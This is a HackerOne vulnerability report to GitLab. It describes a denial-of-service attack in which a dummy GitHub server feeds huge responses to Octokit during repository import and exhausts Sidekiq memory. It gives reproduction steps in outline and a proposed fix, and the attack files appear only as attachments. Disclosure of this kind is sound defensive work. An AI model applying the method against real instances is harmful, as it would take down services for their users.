Sidekiq DOS and Puma DOS by importing a repo from a GitHub dummy server using POST /api/v4/import/github
HackerOne report #2499070 by a92847865
on 2024-05-10, assigned to @greg:
Report | Attachments | How To Reproduce
Report
NOTE! Thanks for submitting a report! Please note that initial triage is handled by HackerOne staff. They are identified with a
HackerOne triage
badge and will escalate to the GitLab team any. Please replace all the (parenthesized) sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
Summary
When studying an old cool bug (#371098 (closed)), I observe that Sawyer creates a lot of objects during response processing. Due to the lack of response's data validation, it is possible to respond to a call from Octokit with arbitrarily large and complex data and Octokit (using Sawyer) is willing to deserialize. Attacker can craft a medium size payload (around 40MB) and send it to Octokit to crash high memory Sidekiq instance (memory limit: 12GB).
Since for every issues, pull request comments and several things, a job is created; an attacker can create several payloads in a repo to maximize the damage. In theory, one import request can take down a whole fleet of Sidekiq instances.
Steps to reproduce
(Step-by-step guide to reproduce the issue, including:)
(1. any preconditions in the environment)
(2. complete HTTP or API request, or)
(3. user action, )
(4. etc.)
- Install a self-managed Gitlab instance, enable Github import, obtain a Personal Access Token
- Run a dummy server using attack zip file
- Modify curl_import.sh (inside zip file) with your PAT, dummy server's address, Gitlab instance's address
- Send request to your Gitlab instance
- Observe Sidekiq excessive memory usage using htop
Impact
One repo import request can take down a whole big fleet of Sidekiq instances by poisoning the job queue. To recover from this, we certainly need to pop all bad jobs from the queue which potentially disrupting other services.
Examples
(If the bug is project related, please create an example project and export it using the project export feature)
(If you are using an older version of GitLab, this will also help determine whether the bug has been fixed in a more recent version)
(If the bug can be reproduced on GitLab.com without violating the Rules of Engagement
as outlined in the program policy, please provide the full path to the project.)
What is the current bug behavior?
Octokit does not validate responses' data before deserialization
What is the expected correct behavior?
Simply adding a Octokit middleware to check responses' data size.
Relevant logs and/or screenshots
(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)
My VM (16GB memory) crashed and Sidekiq thread occupied over 14 GB memory.
{F3259308}
Output of checks
(If you are reporting a bug on GitLab.com, write: This bug happens on GitLab.com)
Results of GitLab environment info
'''System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.1.4p223
Gem Version: 3.5.7
Bundler Version:2.5.8
Rake Version: 13.0.6
Redis Version: 7.0.15
Sidekiq Version:7.1.6
Go Version: unknown
GitLab information
Version: 16.11.2-ee
Revision: d210b947
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 14.11
URL: http://34.125.73.177
HTTP Clone URL: http://34.125.73.177/some-group/some-project.git
SSH Clone URL: git@34.125.73.177:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.35.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Gitaly
- default Address: unix:/var/opt/gitlab/gitaly/gitaly.socket
- default Version: 16.11.2
- default Git Version: 2.43.2'''
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:env:info
)
(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production
)
Impact
One malicious import request potentially taking down a whole fleet of Sidekiq instances, poisoning the job queue
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: